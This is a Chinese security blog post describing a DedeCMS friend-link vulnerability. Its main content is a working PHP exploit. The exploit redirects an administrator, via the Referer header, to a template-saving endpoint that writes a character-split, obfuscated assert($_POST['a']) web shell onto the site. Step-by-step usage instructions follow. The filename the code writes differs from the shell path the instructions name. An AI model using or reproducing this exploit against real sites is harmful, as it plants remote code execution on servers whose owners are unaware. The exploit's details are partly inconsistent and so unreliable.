DeDeCMS友链Getshell

WEB安全   DYBOY  10575 2018-6-14 

标签: web安全 getshell

DEDECMS的一个漏洞

0x00 漏洞详情

http://0day5.com/archives/4209/

0x01 EXP

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);
$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

0x02 利用方法

  1. 保存上方exp,上传至服务器;

  2. 访问目标网站:http://www.test.com/plus/flink.php 链接填写部署的exp的URL;

  3. 等待管理员触发,得到shell地址http://www.test.com/include/taglib/dy.lib.php

上一篇
DedeCMS 20140201 之前的5.7通杀SQL注入漏洞
下一篇
python抓取网易云音乐热评做词图数据分析

版权声明:《 DeDeCMS友链Getshell 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-6-14 12:06:55

相关推荐

7990人看过

NC Listener

13566人看过

找到一个SQL注入漏洞之后...

24581人看过

[PHP防火墙]输入内容存在危险字符,安全起见,已被本站拦截

11092人看过

[代码审计]Mini CMS V1.1

7307人看过

PHP反序列化深入理解

发表评论 / Comment

用心评论~